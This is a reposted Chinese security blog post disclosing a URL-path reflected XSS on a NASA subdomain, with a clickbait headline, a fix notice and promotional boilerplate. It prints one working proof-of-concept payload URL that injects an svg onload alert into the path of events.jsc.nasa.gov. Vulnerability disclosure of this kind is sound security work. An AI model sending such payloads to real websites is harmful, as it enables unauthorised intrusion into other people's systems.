震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞

admin 2021年10月31日02:52:25评论73 views字数 463阅读1分32秒阅读模式
震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
点击蓝字·关注我们

话少事大

美国宇航局(NASA)存在基于URL Path的 XSS漏洞

震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞

哈哈,标题党了,其实是个子域名里的XSS。。。

NASA的子域名数量十分庞大,这种漏洞感觉应该少不了。


Payload

https://events.jsc.nasa.gov/<svg onload=alert(document.domain)>/admin/login.cfm

(预告,明天公众号会分享几个XSS案例,其中会讲什么是基于URL Path的 XSS)


P.S. 目前测试,NASA 已修复此漏洞

震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
END
震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
免责声明

本公众号内的文章及工具仅提供学习用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。


今日关注福利

震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞
发表于1小时前cckuailong
查看:xxxx回复:yyyy

回复 book1 ,获取 我收藏的安全电子书pdf合集,都是很经典的书,免费送给大家


好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(我不是Hacker):震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月31日02:52:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   震惊!堂堂美国宇航局(NASA)居然存在 XSS漏洞http://cn-sec.com/archives/606035.html

发表评论

匿名网友 填写信息